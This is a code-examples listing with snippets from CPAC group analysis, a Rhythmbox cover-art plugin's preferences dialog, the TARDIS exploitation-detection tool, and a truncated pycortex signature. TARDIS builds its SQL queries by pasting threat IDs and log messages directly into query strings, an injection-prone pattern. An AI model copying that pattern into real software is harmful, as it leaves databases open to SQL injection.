        for old_ev in old_ev_list:
            for new_ev in ev_list:
                if old_ev + "__FOR" in new_ev:
                    if old_ev not in rename.keys():
                        rename[old_ev] = []
                    rename[old_ev].append(new_ev)

        for old_ev in rename.keys():
            design_formula = design_formula.replace(old_ev, \
                                                   " + ".join(rename[old_ev]))


    # prep design formula for Patsy
    design_formula = patsify_design_formula(design_formula, cat_list, \
                         group_config_obj.coding_scheme[0])
    print design_formula
    # send to Patsy
    try:
        dmatrix = patsy.dmatrix(design_formula, model_df)
    except Exception as e:
        err = "\n\n[!] Something went wrong with processing the group model "\
              "design matrix using the Python Patsy package. Patsy might " \
              "not be properly installed, or there may be an issue with the "\
              "formatting of the design matrix.\n\nPatsy-formatted design " \
              "formula: %s\n\nError details: %s\n\n" \
              % (model_df.columns, design_formula, e)
        raise Exception(err)

    print dmatrix.design_info.column_names
    print dmatrix

    # check the model for multicollinearity - Patsy takes care of this, but
    # just in case
    check_multicollinearity(np.array(dmatrix))

    # prepare for final stages
    column_names = dmatrix.design_info.column_names

    # what is this for?
    design_matrix = np.array(dmatrix, dtype=np.float16)
    
        
    # check to make sure there are more time points than EVs!
    if len(column_names) >= num_subjects:
        err = "\n\n[!] CPAC says: There are more EVs than there are " \
              "participants currently included in the model for %s. There " \
              "must be more participants than EVs in the design.\n\nNumber " \
              "of participants: %d\nNumber of EVs: %d\n\nEV/covariate list: "\
              "%s\n\nNote: If you specified to model group " \
              "variances separately, the amount of EVs can nearly double " \
              "once they are split along the grouping variable.\n\n" \
              "If the number of subjects is lower than the number of " \
              "subjects in your group analysis subject list, this may be " \
              "because not every subject in the subject list has an output " \
              "for %s in the individual-level analysis output directory.\n\n"\
              % (resource_id, num_subjects, len(column_names), column_names, \
                 resource_id)
        raise Exception(err)

    # time for contrasts
    contrasts_dict = None

    if ((custom_confile == None) or (custom_confile == '') or \
            ("None" in custom_confile) or ("none" in custom_confile)):

        # if no custom contrasts matrix CSV provided (i.e. the user
        # specified contrasts in the GUI)
        contrasts_list = group_config_obj.contrasts
        contrasts_dict = create_contrasts_dict(dmatrix, contrasts_list,
            resource_id)

    # check the merged file's order
    check_merged_file(model_df["Filepath"], merge_file)

    # we must demean the categorical regressors if the Intercept/Grand Mean
    # is included in the model, otherwise FLAME produces blank outputs
    if "Intercept" in column_names:

        cat_indices = []
        col_name_indices = dmatrix.design_info.column_name_indexes
        for col_name in col_name_indices.keys():
            if "C(" in col_name:
                cat_indices.append(int(col_name_indices[col_name]))

        # note: dmat_T is now no longer a DesignMatrix Patsy object, but only
        # an array
        dmat_T = dmatrix.transpose()

        for index in cat_indices:
            new_row = []
            for val in dmat_T[index]:
                new_row.append(val - dmat_T[index].mean())
            dmat_T[index] = new_row

        # we can go back, but we won't be the same
        dmatrix = dmat_T.transpose()

        readme_flags.append("cat_demeaned")

    # send off the info so the FLAME input model files can be generated!
    mat_file, grp_file, con_file, fts_file = create_flame_model_files(dmatrix, \
        column_names, contrasts_dict, custom_confile, ftest_list, \
        group_config_obj.group_sep, grp_vector, group_config_obj.coding_scheme[0], \
        model_name, resource_id, model_path)

    dmat_csv_path = os.path.join(model_path, "design_matrix.csv")
    write_design_matrix_csv(dmatrix, model_df["Participant"], column_names, \
        dmat_csv_path)

    # workflow time
    wf_name = "%s_%s" % (resource_id, series_or_repeated_label)
    wf = pe.Workflow(name=wf_name)

    wf.base_dir = work_dir
    crash_dir = os.path.join(pipeline_config_obj.crashLogDirectory, \
                             "group_analysis", model_name)

    wf.config['execution'] = {'hash_method': 'timestamp', \
                              'crashdump_dir': crash_dir} 

    # gpa_wf
    # Creates the actual group analysis workflow
    gpa_wf = create_group_analysis(fTest, "gp_analysis_%s" % wf_name)

    gpa_wf.inputs.inputspec.merged_file = merge_file
    gpa_wf.inputs.inputspec.merge_mask = merge_mask

    gpa_wf.inputs.inputspec.z_threshold = z_threshold
    gpa_wf.inputs.inputspec.p_threshold = p_threshold
    gpa_wf.inputs.inputspec.parameters = (pipeline_config_obj.FSLDIR, \
                                          'MNI152')

    gpa_wf.inputs.inputspec.mat_file = mat_file
    gpa_wf.inputs.inputspec.con_file = con_file
    gpa_wf.inputs.inputspec.grp_file = grp_file

    if fTest:
        gpa_wf.inputs.inputspec.fts_file = fts_file      

    # ds
    # Creates the datasink node for group analysis
    ds = pe.Node(nio.DataSink(), name='gpa_sink')
     
    #     if c.mixedScanAnalysis == True:
    #         out_dir = re.sub(r'(\w)*scan_(\w)*(\d)*(\w)*[/]', '', out_dir)
              
    ds.inputs.base_directory = str(out_dir)
    ds.inputs.container = ''
        
    ds.inputs.regexp_substitutions = [(r'(?<=rendered)(.)*[/]','/'),
                                      (r'(?<=model_files)(.)*[/]','/'),
                                      (r'(?<=merged)(.)*[/]','/'),
                                      (r'(?<=stats/clusterMap)(.)*[/]','/'),
                                      (r'(?<=stats/unthreshold)(.)*[/]','/'),
                                      (r'(?<=stats/threshold)(.)*[/]','/'),
                                      (r'_cluster(.)*[/]',''),
                                      (r'_slicer(.)*[/]',''),
                                      (r'_overlay(.)*[/]','')]
   

    ########datasink connections#########
    # (the tokens after '@' below are just DataSink input labels; files still
    # land in the parent sub-folder, e.g. stats/unthreshold/, without clobbering)
    #if fTest:
    #    wf.connect(gp_flow, 'outputspec.fts',
    #               ds, 'model_files.@fts')

    #wf.connect(gp_flow, 'outputspec.mat',
    #           ds, 'model_files.@mat')
    #wf.connect(gp_flow, 'outputspec.con',
    #           ds, 'model_files.@con')
    #wf.connect(gp_flow, 'outputspec.grp',
    #           ds, 'model_files.@grp')
    wf.connect(gpa_wf, 'outputspec.merged',
               ds, 'merged')
    wf.connect(gpa_wf, 'outputspec.zstats',
               ds, 'stats.unthreshold')
    wf.connect(gpa_wf, 'outputspec.zfstats',
               ds, 'stats.unthreshold.@zf')
    wf.connect(gpa_wf, 'outputspec.fstats',
               ds, 'stats.unthreshold.@f')
    wf.connect(gpa_wf, 'outputspec.cluster_threshold_zf',
               ds, 'stats.threshold')
    wf.connect(gpa_wf, 'outputspec.cluster_index_zf',
               ds, 'stats.clusterMap')
    wf.connect(gpa_wf, 'outputspec.cluster_localmax_txt_zf',
               ds, 'stats.clusterMap.@localmax_zf')
    wf.connect(gpa_wf, 'outputspec.overlay_threshold_zf',
               ds, 'rendered')
    wf.connect(gpa_wf, 'outputspec.rendered_image_zf',
               ds, 'rendered.@image_zf')
    wf.connect(gpa_wf, 'outputspec.cluster_threshold',
               ds, 'stats.threshold.@z')
    wf.connect(gpa_wf, 'outputspec.cluster_index',
               ds, 'stats.clusterMap.@z')
    wf.connect(gpa_wf, 'outputspec.cluster_localmax_txt',
               ds, 'stats.clusterMap.@localmax')
    wf.connect(gpa_wf, 'outputspec.overlay_threshold',
               ds, 'rendered.@overlay')
    wf.connect(gpa_wf, 'outputspec.rendered_image',
               ds, 'rendered.@image')
       
    ######################################

    # Run the actual group analysis workflow
    wf.run()

    print "\n\nWorkflow finished for model %s\n\n" % wf_name

Example 109

View license
    def _create_display_contents(self, plugin):
        print("DEBUG - create_display_contents")
        # create the ui
        self._first_run = True
        cl = CoverLocale()
        cl.switch_locale(cl.Locale.LOCALE_DOMAIN)
        builder = Gtk.Builder()
        builder.set_translation_domain(cl.Locale.LOCALE_DOMAIN)
        builder.add_from_file(rb.find_plugin_file(plugin,
                                                  'ui/coverart_browser_prefs.ui'))
        self.launchpad_button = builder.get_object('show_launchpad')
        self.launchpad_label = builder.get_object('launchpad_label')

        builder.connect_signals(self)

        # . TRANSLATORS: Do not translate this string.
        translators = _('translator-credits')

        if translators != "translator-credits":
            self.launchpad_label.set_text(translators)
        else:
            self.launchpad_button.set_visible(False)

        gs = GSetting()
        # bind the toggles to the settings
        toggle_statusbar = builder.get_object('custom_statusbar_checkbox')
        self.settings.bind(gs.PluginKey.CUSTOM_STATUSBAR,
                           toggle_statusbar, 'active', Gio.SettingsBindFlags.DEFAULT)

        toggle_text = builder.get_object('display_text_checkbox')
        self.settings.bind(gs.PluginKey.DISPLAY_TEXT, toggle_text, 'active',
                           Gio.SettingsBindFlags.DEFAULT)

        box_text = builder.get_object('display_text_box')
        self.settings.bind(gs.PluginKey.DISPLAY_TEXT, box_text, 'sensitive',
                           Gio.SettingsBindFlags.GET)

        self.display_text_pos = self.settings[gs.PluginKey.DISPLAY_TEXT_POS]
        self.display_text_under_radiobutton = builder.get_object('display_text_under_radiobutton')
        self.display_text_within_radiobutton = builder.get_object('display_text_within_radiobutton')

        if self.display_text_pos:
            self.display_text_under_radiobutton.set_active(True)
        else:
            self.display_text_within_radiobutton.set_active(True)

        random_scale = builder.get_object('random_adjustment')
        self.settings.bind(gs.PluginKey.RANDOM, random_scale, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        toggle_text_ellipsize = builder.get_object(
            'display_text_ellipsize_checkbox')
        self.settings.bind(gs.PluginKey.DISPLAY_TEXT_ELLIPSIZE,
                           toggle_text_ellipsize, 'active', Gio.SettingsBindFlags.DEFAULT)

        box_text_ellipsize_length = builder.get_object(
            'display_text_ellipsize_length_box')
        self.settings.bind(gs.PluginKey.DISPLAY_TEXT_ELLIPSIZE,
                           box_text_ellipsize_length, 'sensitive', Gio.SettingsBindFlags.GET)

        spinner_text_ellipsize_length = builder.get_object(
            'display_text_ellipsize_length_spin')
        self.settings.bind(gs.PluginKey.DISPLAY_TEXT_ELLIPSIZE_LENGTH,
                           spinner_text_ellipsize_length, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        spinner_font_size = builder.get_object(
            'display_font_spin')
        self.settings.bind(gs.PluginKey.DISPLAY_FONT_SIZE,
                           spinner_font_size, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        cover_size_scale = builder.get_object('cover_size_adjustment')

        #self.settings.bind(gs.PluginKey.COVER_SIZE, cover_size_scale, 'value',
        #                   Gio.SettingsBindFlags.DEFAULT)
        self._cover_size = self.settings[gs.PluginKey.COVER_SIZE]
        cover_size_scale.set_value(self._cover_size)
        cover_size_scale.connect('value-changed', self.on_cover_size_scale_changed)

        add_shadow = builder.get_object('add_shadow_checkbox')
        self.settings.bind(gs.PluginKey.ADD_SHADOW, add_shadow, 'active',
                           Gio.SettingsBindFlags.DEFAULT)

        rated_box = builder.get_object('rated_box')
        self.stars = ReactiveStar(size=StarSize.BIG)

        self.stars.connect('changed', self.rating_changed_callback)

        align = Gtk.Alignment.new(0.5, 0, 0, 0.1)
        align.add(self.stars)
        rated_box.add(align)

        self.stars.set_rating(self.settings[gs.PluginKey.RATING])

        autostart = builder.get_object('autostart_checkbox')
        self.settings.bind(gs.PluginKey.AUTOSTART,
                           autostart, 'active', Gio.SettingsBindFlags.DEFAULT)

        toolbar_pos_combo = builder.get_object('show_in_combobox')
        renderer = Gtk.CellRendererText()
        toolbar_pos_combo.pack_start(renderer, True)
        toolbar_pos_combo.add_attribute(renderer, 'text', 1)
        self.settings.bind(gs.PluginKey.TOOLBAR_POS, toolbar_pos_combo,
                           'active-id', Gio.SettingsBindFlags.DEFAULT)

        light_source_combo = builder.get_object('light_source_combobox')
        renderer = Gtk.CellRendererText()
        light_source_combo.pack_start(renderer, True)
        light_source_combo.add_attribute(renderer, 'text', 1)
        self.settings.bind(gs.PluginKey.SHADOW_IMAGE, light_source_combo,
                           'active-id', Gio.SettingsBindFlags.DEFAULT)

        combo_liststore = builder.get_object('combo_liststore')

        from coverart_utils import Theme

        for theme in Theme(self).themes:
            combo_liststore.append([theme, theme])

        theme_combo = builder.get_object('theme_combobox')
        renderer = Gtk.CellRendererText()
        theme_combo.pack_start(renderer, True)
        theme_combo.add_attribute(renderer, 'text', 1)
        self.settings.bind(gs.PluginKey.THEME, theme_combo,
                           'active-id', Gio.SettingsBindFlags.DEFAULT)

        button_relief = builder.get_object('button_relief_checkbox')
        self.settings.bind(gs.PluginKey.BUTTON_RELIEF, button_relief, 'active',
                           Gio.SettingsBindFlags.DEFAULT)

        # create user data files
        cachedir = RB.user_cache_dir() + "/coverart_browser/usericons"
        if not os.path.exists(cachedir):
            os.makedirs(cachedir)

        popup = cachedir + "/popups.xml"

        temp = RB.find_user_data_file('plugins/coverart_browser/img/usericons/popups.xml')

        # lets see if there is a legacy file - if necessary copy it to the cache dir
        if os.path.isfile(temp) and not os.path.isfile(popup):
            shutil.copyfile(temp, popup)

        if not os.path.isfile(popup):
            template = rb.find_plugin_file(plugin, 'template/popups.xml')
            folder = os.path.split(popup)[0]
            if not os.path.exists(folder):
                os.makedirs(folder)
            shutil.copyfile(template, popup)

        # now prepare the genre tab
        from coverart_utils import GenreConfiguredSpriteSheet
        from coverart_utils import get_stock_size

        self._sheet = GenreConfiguredSpriteSheet(plugin, "genre", get_stock_size())

        self.alt_liststore = builder.get_object('alt_liststore')
        self.alt_user_liststore = builder.get_object('alt_user_liststore')
        self._iters = {}
        for key in list(self._sheet.keys()):
            store_iter = self.alt_liststore.append([key, self._sheet[key]])
            self._iters[(key, self.GENRE_POPUP)] = store_iter

        for key, value in self._sheet.genre_alternate.items():
            if key.genre_type == GenreConfiguredSpriteSheet.GENRE_USER:
                store_iter = self.alt_user_liststore.append([key.name,
                                                             self._sheet[self._sheet.genre_alternate[key]],
                                                             self._sheet.genre_alternate[key]])
                self._iters[(key.name, self.GENRE_LIST)] = store_iter

        self.amend_mode = False
        self.blank_iter = None
        self.genre_combobox = builder.get_object('genre_combobox')
        self.genre_entry = builder.get_object('genre_entry')
        self.genre_view = builder.get_object('genre_view')
        self.save_button = builder.get_object('save_button')
        self.filechooserdialog = builder.get_object('filechooserdialog')
        last_genre_folder = self.settings[gs.PluginKey.LAST_GENRE_FOLDER]
        if last_genre_folder != "":
            self.filechooserdialog.set_current_folder(last_genre_folder)

        padding_scale = builder.get_object('padding_adjustment')
        self.settings.bind(gs.PluginKey.ICON_PADDING, padding_scale, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        spacing_scale = builder.get_object('spacing_adjustment')
        self.settings.bind(gs.PluginKey.ICON_SPACING, spacing_scale, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        icon_automatic = builder.get_object('icon_automatic_checkbox')
        self.settings.bind(gs.PluginKey.ICON_AUTOMATIC,
                           icon_automatic, 'active', Gio.SettingsBindFlags.DEFAULT)

        #flow tab
        flow_combo = builder.get_object('flow_combobox')
        renderer = Gtk.CellRendererText()
        flow_combo.pack_start(renderer, True)
        flow_combo.add_attribute(renderer, 'text', 1)
        self.settings.bind(gs.PluginKey.FLOW_APPEARANCE, flow_combo,
                           'active-id', Gio.SettingsBindFlags.DEFAULT)

        flow_hide = builder.get_object('hide_caption_checkbox')
        self.settings.bind(gs.PluginKey.FLOW_HIDE_CAPTION,
                           flow_hide, 'active', Gio.SettingsBindFlags.DEFAULT)

        flow_scale = builder.get_object('cover_scale_adjustment')
        self.settings.bind(gs.PluginKey.FLOW_SCALE, flow_scale, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        flow_width = builder.get_object('cover_width_adjustment')
        self.settings.bind(gs.PluginKey.FLOW_WIDTH, flow_width, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        flow_max = builder.get_object('flow_max_adjustment')
        self.settings.bind(gs.PluginKey.FLOW_MAX, flow_max, 'value',
                           Gio.SettingsBindFlags.DEFAULT)

        flow_automatic = builder.get_object('automatic_checkbox')
        self.settings.bind(gs.PluginKey.FLOW_AUTOMATIC,
                           flow_automatic, 'active', Gio.SettingsBindFlags.DEFAULT)

        self.background_colour = self.settings[gs.PluginKey.FLOW_BACKGROUND_COLOUR]
        self.white_radiobutton = builder.get_object('white_radiobutton')
        self.black_radiobutton = builder.get_object('black_radiobutton')

        if self.background_colour == 'W':
            self.white_radiobutton.set_active(True)
        else:
            self.black_radiobutton.set_active(True)

        self.text_alignment = self.settings[gs.PluginKey.TEXT_ALIGNMENT]
        self.text_alignment_left_radiobutton = builder.get_object('left_alignment_radiobutton')
        self.text_alignment_centre_radiobutton = builder.get_object('centre_alignment_radiobutton')
        self.text_alignment_right_radiobutton = builder.get_object('right_alignment_radiobutton')

        if self.text_alignment == 0:
            self.text_alignment_left_radiobutton.set_active(True)
        elif self.text_alignment == 1:
            self.text_alignment_centre_radiobutton.set_active(True)
        else:
            self.text_alignment_right_radiobutton.set_active(True)

        # return the dialog
        self._first_run = False
        print("end create dialog contents")
        return builder.get_object('main_notebook')
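
The user-data setup near the end of Example 109 is a common os.path.exists pattern: make sure a per-user cache directory exists, then seed it with a default file only if one is not already there. A condensed sketch of that pattern follows; the paths and template location are placeholders, not the plugin's real ones.

import os
import shutil

def ensure_user_popups(cache_dir, template_path):
    """Create cache_dir if needed and copy a default popups.xml into it once."""
    if not os.path.exists(cache_dir):
        os.makedirs(cache_dir)

    popup = os.path.join(cache_dir, "popups.xml")
    if not os.path.isfile(popup):
        # first run: seed the cache with the bundled template
        shutil.copyfile(template_path, popup)
    return popup

# hypothetical usage:
# ensure_user_popups(os.path.expanduser("~/.cache/coverart_browser/usericons"),
#                    "template/popups.xml")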

Example 110

Project: TARDIS
Source File: TARDIS.py
View license
def main(vulnerability,vulnObject,sourceIP,sourceHost):
	#Create results and working directories
	if not os.path.exists('Results'):
		os.makedirs('Results')
	if not os.path.exists('Working'):
		os.makedirs('Working')
	
	#Make sure the vulnerability is valid
	if vulnerability != "":
		vulnCheck=0
		resultCount=0
		logsource=''
		print("Searching for evidence of \"" + vulnerability + "\"")
		print("  Host: " + sourceIP)
		
		try:
			configFile = 'config.xml'
			tree = ET.parse(configFile)
			root = tree.getroot()
		except:
			sys.exit("Not a valid config XML file")
		for settings in root.findall("./log_source"):
			logsource=settings.text
		cnx = getDBConnector()
		
		
		#check if vulnerability/asset combo exists in assetVulnerability Table
		cursor = cnx.cursor()
		query = ("SELECT count(*) as count from assetVulnerabilities where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "'")
		
		cursor.execute(query)
		for row in cursor:
			vulnCheck=row[0]
		cursor.close()
		
		if vulnCheck==0:
			#No combination exists, write data to DB
			
			cursor = cnx.cursor()
			add_vulnInstance = ("INSERT INTO assetVulnerabilities "
               "(victim_ip, threat_id, active) "
               "VALUES (%s, %s, %s)")
			vulnData = (ip2long(sourceIP), vulnerability, '1')
			
			# Insert new entry
			cursor.execute(add_vulnInstance , vulnData )
			
			cnx.commit()
			cursor.close()
			cnx.close()
		searchStringResults= findStixObservables.run(vulnerability)
		isExploitFound=False
		searchStringCount=0
		operator=searchStringResults[0]
		numResults=0
		if(searchStringResults[1]=="No search file found"):
			searchResults="0"
			print("  No search file found\n")
		elif(searchStringResults[1]=="No supported observables found"):
			searchResults="0"
			print("  No supported observables found\n")
		else:
			#run  search...
			#search should return number of results
			#Insert source host from arguments
			for entry in searchStringResults:
				if logsource=="splunk":
					if (searchStringCount == 1):
						searchString=entry + " AND (host=\"" + sourceHost + "\" OR s_ip=\"" + sourceIP + "\" OR d_host=\"" + sourceHost + "\")  | fields host, c_ip | fields - _bkt, _cd, _indextime, _kv, _serial, _si, _sourcetype | rename _raw as \"Raw Log\" | rename c_ip as clientip"
						numResults=splunk.searchVulnerability(searchString,vulnerability,sourceIP,sourceHost)
						if (numResults != "0"):
							data = json.load(numResults)
					
					if (operator=="AND"):
						if (searchStringCount > 1):
							resultCount=0
							for result in data["results"]:
								startTime =  dateutil.parser.parse(data["results"][resultCount]["_time"]) + datetime.timedelta(days =- 300)
								endTime =  dateutil.parser.parse(data["results"][resultCount]["_time"]) + datetime.timedelta(days = 300)
								searchString=entry + " AND (host=\"" + sourceHost + "\" OR s_ip=\"" + sourceIP + "\" OR d_host=\"" + sourceHost + "\") | fields host, clientip | fields - _bkt, _cd, _indextime, _kv, _serial, _si, _sourcetype | rename _raw as \"Raw Log\""
								newResults=splunk.searchVulnerabilityTimeRange(searchString,vulnerability,sourceIP,sourceHost,startTime.isoformat(),endTime.isoformat())
								if (newResults != "0"):
									#This is the result from search 1
									newData = json.load(newResults)
									newResultCount=0
									for result in newData["results"]:
										try:
											clientip=newData["results"][newResultCount]["clientip"]
										except:
											clientip="0"
										isExploitFound=True
										#These are the results from any further results proving the AND condition
										cnx = getDBConnector()
										cursor = cnx.cursor()
										query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_time = '" + data["results"][resultCount]["_time"] + "'")
										cursor.execute(query)
										for row in cursor:
											logCheck=row[0]
										cursor.close()
										if logCheck==0:
											#Write data to DB
											cursor = cnx.cursor()
											add_logInstance = ("INSERT INTO attackInventory "
																"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
																"VALUES (%s, %s, %s, %s, %s)")
											
											logData = (ip2long(sourceIP), ip2long(clientip), newData["results"][newResultCount]["_time"], newData["results"][newResultCount]["Raw Log"], vulnerability)
											# Insert new entry
											cursor.execute(add_logInstance , logData )
											cnx.commit()
											cursor.close()
										cnx.close()
										newResultCount=newResultCount+1
								else:
									newResultCount=0
							if (isExploitFound==True):
								try:
									clientip=data["results"][resultCount]["clientip"]
								except:
									clientip="0"
								cnx = getDBConnector()
								cursor = cnx.cursor()
								query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_time = '" + data["results"][resultCount]["_time"] + "'")
								cursor.execute(query)
								for row in cursor:
									logCheck=row[0]
								cursor.close()
								if logCheck==0:
									#Write data to DB
									cursor = cnx.cursor()
									add_logInstance = ("INSERT INTO attackInventory "
														"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
														"VALUES (%s, %s, %s, %s, %s)")
									
									logData = (ip2long(sourceIP), ip2long(clientip), data["results"][resultCount]["_time"], data["results"][resultCount]["Raw Log"], vulnerability)
									# Insert new entry
									cursor.execute(add_logInstance , logData )
									cnx.commit()
									cursor.close()
								cnx.close()
								resultCount=newResultCount+1
							else:
								resultCount=newResultCount
					elif (operator=="OR"):
						if (searchStringCount > 0):
							#only keep searching if there are more IOCS to look at...
							if len(searchStringResults)>2:
								searchString=entry + " AND (host=\"" + sourceHost + "\" OR s_ip=\"" + sourceIP + "\" OR d_host=\"" + sourceHost + "\")  | fields host, clientip | fields - _bkt, _cd, _indextime, _kv, _serial, _si, _sourcetype | rename _raw as \"Raw Log\""
								numResults=splunk.searchVulnerability(searchString,vulnerability,sourceIP,sourceHost)
								if (numResults != "0"):
									data = json.load(numResults)
									resultCount=0
									for result in data["results"]:
										isExploitFound=True
										cnx = getDBConnector()
										cursor = cnx.cursor()
										query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_time = '" + data["results"][resultCount]["_time"] + "'")
										cursor.execute(query)
										for row in cursor:
											logCheck=row[0]
										cursor.close()
										if logCheck==0:
											#Write data to DB
											cursor = cnx.cursor()
											add_logInstance = ("INSERT INTO attackInventory "
																"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
																"VALUES (%s, %s, %s, %s, %s)")
											logData = (ip2long(sourceIP), ip2long(data["results"][resultCount]["clientip"]), data["results"][resultCount]["_time"], data["results"][resultCount]["Raw Log"], vulnerability)
											
											# Insert new entry
											cursor.execute(add_logInstance , logData )
											
											cnx.commit()
											cursor.close()
										cnx.close()
										resultCount=resultCount+1
							elif len(searchStringResults)==2:
								searchString=entry + " AND (host=\"" + sourceHost + "\" OR host=\"" + sourceIP + "\" OR s_ip=\"" + sourceIP + "\" OR d_host=\"" + sourceHost + "\")  | fields host, clientip | fields - _bkt, _cd, _indextime, _kv, _serial, _si, _sourcetype | rename _raw as \"Raw Log\""
								numResults=splunk.searchVulnerability(searchString,vulnerability,sourceIP,sourceHost)
								if (numResults != "0"):
									data = json.load(numResults)
									resultCount=0
									for result in data["results"]:
										isExploitFound=True
										cnx = getDBConnector()
										cursor = cnx.cursor()
										query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_time = '" + data["results"][resultCount]["_time"] + "'")
										cursor.execute(query)
										for row in cursor:
											logCheck=row[0]
										cursor.close()
										if logCheck==0:
											#Write data to DB
											cursor = cnx.cursor()
											add_logInstance = ("INSERT INTO attackInventory "
																"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
																"VALUES (%s, %s, %s, %s, %s)")
											
											logData = (ip2long(sourceIP), ip2long(data["results"][resultCount]["clientip"]), data["results"][resultCount]["_time"], data["results"][resultCount]["Raw Log"], vulnerability)
											
											# Insert new entry
											cursor.execute(add_logInstance , logData )
											
											cnx.commit()
											cursor.close()
										cnx.close()
										resultCount=resultCount+1
					searchStringCount=searchStringCount+1
				elif logsource=="elastic_search":
					numResults=0
					startTime="-90d"
					endTime="now"
					#Insert source host from arguments
					entry = re.sub('\<source_host\>', sourceHost, entry)
					#Insert source IP from arguments
					entry = re.sub('\<source_ip\>', sourceIP, entry)
					if (searchStringCount == 1):
						#Insert startTime
						entry = re.sub('\<startTime\>', startTime, entry)
						#Insert endTime
						entry = re.sub('\<endTime\>', endTime, entry)
						if sourceIP == '*':
							entry = re.sub('\<min_count\>', '1', entry)
						else:
							entry = re.sub('\<min_count\>', '2', entry)
						#print entry
						searchResults = ElasticSearchQuery.searchVulnerability(entry,vulnerability,sourceIP,sourceHost)
						#print searchResults
						numResults = getElasticSearchResults(searchResults)
						#print numResults
					if (operator=="AND"):
						if (searchStringCount > 1):
							resultCount=0
							for hit in searchResults['hits']['hits']:
								startTime =  dateutil.parser.parse(hit["_source"]["@timestamp"]) + datetime.timedelta(days =- 1)
								
								endTime =  dateutil.parser.parse(hit["_source"]["@timestamp"]) + datetime.timedelta(days = 1)
								#Insert start time
								entry = re.sub('\<startTime\>', str(startTime.isoformat()), entry)
								#Insert end time
								entry = re.sub('\<endTime\>', str(endTime.isoformat()), entry)
								newSearchResults = ElasticSearchQuery.searchVulnerability(entry,vulnerability,sourceIP,sourceHost)
								newResults = getElasticSearchResults(newSearchResults)
								if (newResults != "0"):
									#This is the result from search 1
									newResultCount=0
									isExploitFound=True
									for newhit in newSearchResults['hits']['hits']:
										try:
											attackerIP=newhit["_source"]["evt_srcip"]
										except:
											attackerIP="0.0.0.0"
										#These are the results from any further results proving the AND condition
										cnx = getDBConnector()
										cursor = cnx.cursor()
										#Check original log hit
										query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_log = '" + newhit["_source"]["message"] + "'")
										cursor.execute(query)
										for row in cursor:
											logCheck=row[0]
										cursor.close()
										if logCheck==0:
											#Write data to DB
											cursor = cnx.cursor()
											add_logInstance = ("INSERT INTO attackInventory "
																"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
																"VALUES (%s, %s, %s, %s, %s)")
											
											logData = (ip2long(sourceIP), ip2long(attackerIP),hit["_source"]["@timestamp"], hit["_source"]["message"], vulnerability)
											# Insert new entry
											cursor.execute(add_logInstance , logData )
										cursor = cnx.cursor()
										#check new log hit
										query = ("SELECT count(*) as count from attackInventory where victim_ip = '" + str(ip2long(sourceIP)) + "' and threat_id = '" + vulnerability + "' and attack_log = '" + newhit["_source"]["message"] + "'")
										cursor.execute(query)
										for row in cursor:
											logCheck=row[0]
										cursor.close()
										if logCheck==0:
											#Write data to DB
											cursor = cnx.cursor()
											add_logInstance = ("INSERT INTO attackInventory "
																"(victim_ip, attacker_ip, attack_time, attack_log, threat_id) "
																"VALUES (%s, %s, %s, %s, %s)")
											
											logData = (ip2long(sourceIP), ip2long(attackerIP),newhit["_source"]["@timestamp"], newhit["_source"]["message"], vulnerability)
											# Insert new entry
											cursor.execute(add_logInstance , logData )
											
											cnx.commit()
											cursor.close()
										cnx.close()
										newResultCount=newResultCount+1
								else:
									newResultCount=0
								resultCount=newResultCount+1
								
								
								
					elif (operator=="OR"):
						if (searchStringCount == 1):
							if (int(numResults) > 0):
								resultCount = int(numResults)
								writeElasticSearchResults(searchResults,vulnObject,sourceIP,vulnerability)
								isExploitFound=True
						if (searchStringCount > 1):
							#Insert startTime
							entry = re.sub('\<startTime\>', startTime, entry)
							#Insert endTime
							entry = re.sub('\<endTime\>', endTime, entry)
							if sourceIP == '*':
								entry = re.sub('\<min_count\>', '1', entry)
							else:
								entry = re.sub('\<min_count\>', '2', entry)
							#only keep searching if there are more IOCS to look at...
							if len(searchStringResults)>1:
								searchResults = ElasticSearchQuery.searchVulnerability(entry,vulnerability,sourceIP,sourceHost)
								numResults = getElasticSearchResults(searchResults)
								if int(numResults) > 0:
									writeElasticSearchResults(searchResults,vulnObject,sourceIP,vulnerability)
								resultCount = resultCount + int(numResults)
					searchStringCount=searchStringCount+1
			if (isExploitFound==True):
				print("  Found " + str(resultCount) + " instances of exploitation!")
				print("  Generating attack logs") 
				#Parse through data list to get elastic timestamp for audit log times...
			else:
				print("  No instances of exploitation found.\n")
	else:
		resultCount=0
		print("Invalid vulnerability ID")
	return(resultCount)
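
The directory bootstrap at the top of Example 110 (if not os.path.exists('Results'): os.makedirs('Results')) has a small race: another process can create the directory between the check and the makedirs call. A defensive variant is sketched below; on Python 3, os.makedirs(path, exist_ok=True) covers it, while the try/except form also works on Python 2.

import errno
import os

def ensure_dir(path):
    """Create path if it does not exist, tolerating a concurrent creator."""
    try:
        os.makedirs(path)
    except OSError as exc:
        if exc.errno != errno.EEXIST or not os.path.isdir(path):
            raise

# Python 3 only: os.makedirs("Results", exist_ok=True)
for name in ("Results", "Working"):
    ensure_dir(name)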

Example 111

Project: pycortex
Source File: view.py
View license
def show(data, types=("inflated",), recache=False, cmap='RdBu_r', layout=None,
         autoclose=True, open_browser=True, port=None, pickerfun=None,
         disp_layers=['rois'], extra_disp=None, template='mixer.html', **kwargs):
